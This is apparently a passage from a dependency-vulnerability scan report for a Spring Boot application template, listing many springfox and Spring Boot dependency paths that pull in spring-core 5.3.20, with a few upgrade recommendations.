  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
